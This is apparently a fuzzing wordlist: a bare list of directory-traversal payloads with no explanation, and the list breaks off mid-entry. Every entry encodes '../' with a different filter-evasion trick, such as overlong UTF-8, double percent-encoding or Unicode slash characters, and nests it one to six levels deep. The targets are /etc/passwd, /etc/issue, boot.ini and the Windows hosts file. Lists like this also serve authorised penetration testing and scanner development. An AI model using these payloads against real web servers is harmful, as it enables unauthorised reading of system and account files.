-?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pcboot.ini -?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -?.%c0%9vetc%c0%9vpasswd -?.%c0%9vetc%c0%9vissue -?.%c0%9vboot.ini -?.%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -?.%c0%9v?.%c0%9vetc%c0%9vpasswd -?.%c0%9v?.%c0%9vetc%c0%9vissue -?.%c0%9v?.%c0%9vboot.ini -?.%c0%9v?.%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -?.%c0%9v?.%c0%9v?.%c0%9vetc%c0%9vpasswd -?.%c0%9v?.%c0%9v?.%c0%9vetc%c0%9vissue -?.%c0%9v?.%c0%9v?.%c0%9vboot.ini -?.%c0%9v?.%c0%9v?.%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9vetc%c0%9vpasswd -?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9vetc%c0%9vissue -?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9vboot.ini -?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9vetc%c0%9vpasswd -?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9vetc%c0%9vissue -?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9vboot.ini -?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9vetc%c0%9vpasswd -?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9vetc%c0%9vissue -?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9vboot.ini -?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9v?.%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -?.%c0%qfetc%c0%qfpasswd -?.%c0%qfetc%c0%qfissue -?.%c0%qfboot.ini -?.%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -?.%c0%qf?.%c0%qfetc%c0%qfpasswd -?.%c0%qf?.%c0%qfetc%c0%qfissue -?.%c0%qf?.%c0%qfboot.ini -?.%c0%qf?.%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -?.%c0%qf?.%c0%qf?.%c0%qfetc%c0%qfpasswd -?.%c0%qf?.%c0%qf?.%c0%qfetc%c0%qfissue -?.%c0%qf?.%c0%qf?.%c0%qfboot.ini -?.%c0%qf?.%c0%qf?.%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qfetc%c0%qfpasswd -?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qfetc%c0%qfissue -?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qfboot.ini -?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qfetc%c0%qfpasswd -?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qfetc%c0%qfissue -?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qfboot.ini -?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qfetc%c0%qfpasswd -?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qfetc%c0%qfissue -?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qfboot.ini -?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qf?.%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -?.%c1%8setc%c1%8spasswd -?.%c1%8setc%c1%8sissue -?.%c1%8sboot.ini -?.%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -?.%c1%8s?.%c1%8setc%c1%8spasswd -?.%c1%8s?.%c1%8setc%c1%8sissue -?.%c1%8s?.%c1%8sboot.ini -?.%c1%8s?.%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -?.%c1%8s?.%c1%8s?.%c1%8setc%c1%8spasswd -?.%c1%8s?.%c1%8s?.%c1%8setc%c1%8sissue -?.%c1%8s?.%c1%8s?.%c1%8sboot.ini -?.%c1%8s?.%c1%8s?.%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8setc%c1%8spasswd -?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8setc%c1%8sissue -?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8sboot.ini -?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8setc%c1%8spasswd -?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8setc%c1%8sissue -?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8sboot.ini -?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8setc%c1%8spasswd -?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8setc%c1%8sissue -?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8sboot.ini -?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8s?.%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -?.%c1%1cetc%c1%1cpasswd -?.%c1%1cetc%c1%1cissue -?.%c1%1cboot.ini -?.%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -?.%c1%1c?.%c1%1cetc%c1%1cpasswd -?.%c1%1c?.%c1%1cetc%c1%1cissue -?.%c1%1c?.%c1%1cboot.ini -?.%c1%1c?.%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -?.%c1%1c?.%c1%1c?.%c1%1cetc%c1%1cpasswd -?.%c1%1c?.%c1%1c?.%c1%1cetc%c1%1cissue -?.%c1%1c?.%c1%1c?.%c1%1cboot.ini -?.%c1%1c?.%c1%1c?.%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1cetc%c1%1cpasswd -?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1cetc%c1%1cissue -?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1cboot.ini -?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1cetc%c1%1cpasswd -?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1cetc%c1%1cissue -?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1cboot.ini -?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1cetc%c1%1cpasswd -?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1cetc%c1%1cissue -?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1cboot.ini -?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1c?.%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -?.%c1%afetc%c1%afpasswd -?.%c1%afetc%c1%afissue -?.%c1%afboot.ini -?.%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -?.%c1%af?.%c1%afetc%c1%afpasswd -?.%c1%af?.%c1%afetc%c1%afissue -?.%c1%af?.%c1%afboot.ini -?.%c1%af?.%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -?.%c1%af?.%c1%af?.%c1%afetc%c1%afpasswd -?.%c1%af?.%c1%af?.%c1%afetc%c1%afissue -?.%c1%af?.%c1%af?.%c1%afboot.ini -?.%c1%af?.%c1%af?.%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -?.%c1%af?.%c1%af?.%c1%af?.%c1%afetc%c1%afpasswd -?.%c1%af?.%c1%af?.%c1%af?.%c1%afetc%c1%afissue -?.%c1%af?.%c1%af?.%c1%af?.%c1%afboot.ini -?.%c1%af?.%c1%af?.%c1%af?.%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -?.%c1%af?.%c1%af?.%c1%af?.%c1%af?.%c1%afetc%c1%afpasswd -?.%c1%af?.%c1%af?.%c1%af?.%c1%af?.%c1%afetc%c1%afissue -?.%c1%af?.%c1%af?.%c1%af?.%c1%af?.%c1%afboot.ini -?.%c1%af?.%c1%af?.%c1%af?.%c1%af?.%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -?.%c1%af?.%c1%af?.%c1%af?.%c1%af?.%c1%af?.%c1%afetc%c1%afpasswd -?.%c1%af?.%c1%af?.%c1%af?.%c1%af?.%c1%af?.%c1%afetc%c1%afissue -?.%c1%af?.%c1%af?.%c1%af?.%c1%af?.%c1%af?.%c1%afboot.ini -?.%c1%af?.%c1%af?.%c1%af?.%c1%af?.%c1%af?.%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -?.%bg%qfetc%bg%qfpasswd -?.%bg%qfetc%bg%qfissue -?.%bg%qfboot.ini -?.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -?.%bg%qf?.%bg%qfetc%bg%qfpasswd -?.%bg%qf?.%bg%qfetc%bg%qfissue -?.%bg%qf?.%bg%qfboot.ini -?.%bg%qf?.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -?.%bg%qf?.%bg%qf?.%bg%qfetc%bg%qfpasswd -?.%bg%qf?.%bg%qf?.%bg%qfetc%bg%qfissue -?.%bg%qf?.%bg%qf?.%bg%qfboot.ini -?.%bg%qf?.%bg%qf?.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qfetc%bg%qfpasswd -?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qfetc%bg%qfissue -?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qfboot.ini -?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qfetc%bg%qfpasswd -?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qfetc%bg%qfissue -?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qfboot.ini -?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qfetc%bg%qfpasswd -?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qfetc%bg%qfissue -?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qfboot.ini -?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qf?.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -?.%u2215etc%u2215passwd -?.%u2215etc%u2215issue -?.%u2215boot.ini -?.%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -?.%u2215?.%u2215etc%u2215passwd -?.%u2215?.%u2215etc%u2215issue -?.%u2215?.%u2215boot.ini -?.%u2215?.%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -?.%u2215?.%u2215?.%u2215etc%u2215passwd -?.%u2215?.%u2215?.%u2215etc%u2215issue -?.%u2215?.%u2215?.%u2215boot.ini -?.%u2215?.%u2215?.%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -?.%u2215?.%u2215?.%u2215?.%u2215etc%u2215passwd -?.%u2215?.%u2215?.%u2215?.%u2215etc%u2215issue -?.%u2215?.%u2215?.%u2215?.%u2215boot.ini -?.%u2215?.%u2215?.%u2215?.%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -?.%u2215?.%u2215?.%u2215?.%u2215?.%u2215etc%u2215passwd -?.%u2215?.%u2215?.%u2215?.%u2215?.%u2215etc%u2215issue -?.%u2215?.%u2215?.%u2215?.%u2215?.%u2215boot.ini -?.%u2215?.%u2215?.%u2215?.%u2215?.%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -?.%u2215?.%u2215?.%u2215?.%u2215?.%u2215?.%u2215etc%u2215passwd -?.%u2215?.%u2215?.%u2215?.%u2215?.%u2215?.%u2215etc%u2215issue -?.%u2215?.%u2215?.%u2215?.%u2215?.%u2215?.%u2215boot.ini -?.%u2215?.%u2215?.%u2215?.%u2215?.%u2215?.%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -?.%u2216etc%u2216passwd -?.%u2216etc%u2216issue -?.%u2216boot.ini -?.%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -?.%u2216?.%u2216etc%u2216passwd -?.%u2216?.%u2216etc%u2216issue -?.%u2216?.%u2216boot.ini -?.%u2216?.%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -?.%u2216?.%u2216?.%u2216etc%u2216passwd -?.%u2216?.%u2216?.%u2216etc%u2216issue -?.%u2216?.%u2216?.%u2216boot.ini -?.%u2216?.%u2216?.%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -?.%u2216?.%u2216?.%u2216?.%u2216etc%u2216passwd -?.%u2216?.%u2216?.%u2216?.%u2216etc%u2216issue -?.%u2216?.%u2216?.%u2216?.%u2216boot.ini -?.%u2216?.%u2216?.%u2216?.%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -?.%u2216?.%u2216?.%u2216?.%u2216?.%u2216etc%u2216passwd -?.%u2216?.%u2216?.%u2216?.%u2216?.%u2216etc%u2216issue -?.%u2216?.%u2216?.%u2216?.%u2216?.%u2216boot.ini -?.%u2216?.%u2216?.%u2216?.%u2216?.%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -?.%u2216?.%u2216?.%u2216?.%u2216?.%u2216?.%u2216etc%u2216passwd -?.%u2216?.%u2216?.%u2216?.%u2216?.%u2216?.%u2216etc%u2216issue -?.%u2216?.%u2216?.%u2216?.%u2216?.%u2216?.%u2216boot.ini -?.%u2216?.%u2216?.%u2216?.%u2216?.%u2216?.%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -?.%uEFC8etc%uEFC8passwd -?.%uEFC8etc%uEFC8issue -?.%uEFC8boot.ini -?.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -?.%uEFC8?.%uEFC8etc%uEFC8passwd -?.%uEFC8?.%uEFC8etc%uEFC8issue -?.%uEFC8?.%uEFC8boot.ini -?.%uEFC8?.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -?.%uEFC8?.%uEFC8?.%uEFC8etc%uEFC8passwd -?.%uEFC8?.%uEFC8?.%uEFC8etc%uEFC8issue -?.%uEFC8?.%uEFC8?.%uEFC8boot.ini -?.%uEFC8?.%uEFC8?.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8etc%uEFC8passwd -?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8etc%uEFC8issue -?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8boot.ini -?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8etc%uEFC8passwd -?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8etc%uEFC8issue -?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8boot.ini -?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8etc%uEFC8passwd -?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8etc%uEFC8issue -?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8boot.ini -?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8?.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -?.%uF025etc%uF025passwd -?.%uF025etc%uF025issue -?.%uF025boot.ini -?.%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -?.%uF025?.%uF025etc%uF025passwd -?.%uF025?.%uF025etc%uF025issue -?.%uF025?.%uF025boot.ini -?.%uF025?.%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -?.%uF025?.%uF025?.%uF025etc%uF025passwd -?.%uF025?.%uF025?.%uF025etc%uF025issue -?.%uF025?.%uF025?.%uF025boot.ini -?.%uF025?.%uF025?.%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -?.%uF025?.%uF025?.%uF025?.%uF025etc%uF025passwd -?.%uF025?.%uF025?.%uF025?.%uF025etc%uF025issue -?.%uF025?.%uF025?.%uF025?.%uF025boot.ini -?.%uF025?.%uF025?.%uF025?.%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -?.%uF025?.%uF025?.%uF025?.%uF025?.%uF025etc%uF025passwd -?.%uF025?.%uF025?.%uF025?.%uF025?.%uF025etc%uF025issue -?.%uF025?.%uF025?.%uF025?.%uF025?.%uF025boot.ini -?.%uF025?.%uF025?.%uF025?.%uF025?.%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -?.%uF025?.%uF025?.%uF025?.%uF025?.%uF025?.%uF025etc%uF025passwd -?.%uF025?.%uF025?.%uF025?.%uF025?.%uF025?.%uF025etc%uF025issue -?.%uF025?.%uF025?.%uF025?.%uF025?.%uF025?.%uF025boot.ini -?.%uF025?.%uF025?.%uF025?.%uF025?.%uF025?.%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -?.%%32%%66etc%%32%%66passwd -?.%%32%%66etc%%32%%66issue -?.%%32%%66boot.ini -?.%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -?.%%32%%66?.%%32%%66etc%%32%%66passwd -?.%%32%%66?.%%32%%66etc%%32%%66issue -?.%%32%%66?.%%32%%66boot.ini -?.%%32%%66?.%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -?.%%32%%66?.%%32%%66?.%%32%%66etc%%32%%66passwd -?.%%32%%66?.%%32%%66?.%%32%%66etc%%32%%66issue -?.%%32%%66?.%%32%%66?.%%32%%66boot.ini -?.%%32%%66?.%%32%%66?.%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66etc%%32%%66passwd -?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66etc%%32%%66issue -?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66boot.ini -?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66etc%%32%%66passwd -?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66etc%%32%%66issue -?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66boot.ini -?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66etc%%32%%66passwd -?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66etc%%32%%66issue -?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66boot.ini -?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66?.%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -?.%%35%%63etc%%35%%63passwd -?.%%35%%63etc%%35%%63issue -?.%%35%%63boot.ini -?.%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -?.%%35%%63?.%%35%%63etc%%35%%63passwd -?.%%35%%63?.%%35%%63etc%%35%%63issue -?.%%35%%63?.%%35%%63boot.ini -?.%%35%%63?.%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -?.%%35%%63?.%%35%%63?.%%35%%63etc%%35%%63passwd -?.%%35%%63?.%%35%%63?.%%35%%63etc%%35%%63issue -?.%%35%%63?.%%35%%63?.%%35%%63boot.ini -?.%%35%%63?.%%35%%63?.%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63etc%%35%%63passwd -?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63etc%%35%%63issue -?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63boot.ini -?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63etc%%35%%63passwd -?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63etc%%35%%63issue -?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63boot.ini -?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63etc%%35%%63passwd -?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63etc%%35%%63issue -?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63boot.ini -?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63?.%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -?.%e0%80%afetc%e0%80%afpasswd -?.%e0%80%afetc%e0%80%afissue -?.%e0%80%afboot.ini -?.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -?.%e0%80%af?.%e0%80%afetc%e0%80%afpasswd -?.%e0%80%af?.%e0%80%afetc%e0%80%afissue -?.%e0%80%af?.%e0%80%afboot.ini -?.%e0%80%af?.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -?.%e0%80%af?.%e0%80%af?.%e0%80%afetc%e0%80%afpasswd -?.%e0%80%af?.%e0%80%af?.%e0%80%afetc%e0%80%afissue -?.%e0%80%af?.%e0%80%af?.%e0%80%afboot.ini -?.%e0%80%af?.%e0%80%af?.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%afetc%e0%80%afpasswd -?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%afetc%e0%80%afissue -?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%afboot.ini -?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%afetc%e0%80%afpasswd -?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%afetc%e0%80%afissue -?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%afboot.ini -?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%afetc%e0%80%afpasswd -?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%afetc%e0%80%afissue -?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%afboot.ini -?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%af?.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -?.%25c1%259cetc%25c1%259cpasswd -?.%25c1%259cetc%25c1%259cissue -?.%25c1%259cboot.ini -?.%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -?.%25c1%259c?.%25c1%259cetc%25c1%259cpasswd -?.%25c1%259c?.%25c1%259cetc%25c1%259cissue -?.%25c1%259c?.%25c1%259cboot.ini -?.%25c1%259c?.%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -?.%25c1%259c?.%25c1%259c?.%25c1%259cetc%25c1%259cpasswd -?.%25c1%259c?.%25c1%259c?.%25c1%259cetc%25c1%259cissue -?.%25c1%259c?.%25c1%259c?.%25c1%259cboot.ini -?.%25c1%259c?.%25c1%259c?.%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259cetc%25c1%259cpasswd -?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259cetc%25c1%259cissue -?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259cboot.ini -?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259cetc%25c1%259cpasswd -?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259cetc%25c1%259cissue -?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259cboot.ini -?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259cetc%25c1%259cpasswd -?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259cetc%25c1%259cissue -?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259cboot.ini -?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -?.%25c0%25afetc%25c0%25afpasswd -?.%25c0%25afetc%25c0%25afissue -?.%25c0%25afboot.ini -?.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -?.%25c0%25af?.%25c0%25afetc%25c0%25afpasswd -?.%25c0%25af?.%25c0%25afetc%25c0%25afissue -?.%25c0%25af?.%25c0%25afboot.ini -?.%25c0%25af?.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -?.%25c0%25af?.%25c0%25af?.%25c0%25afetc%25c0%25afpasswd 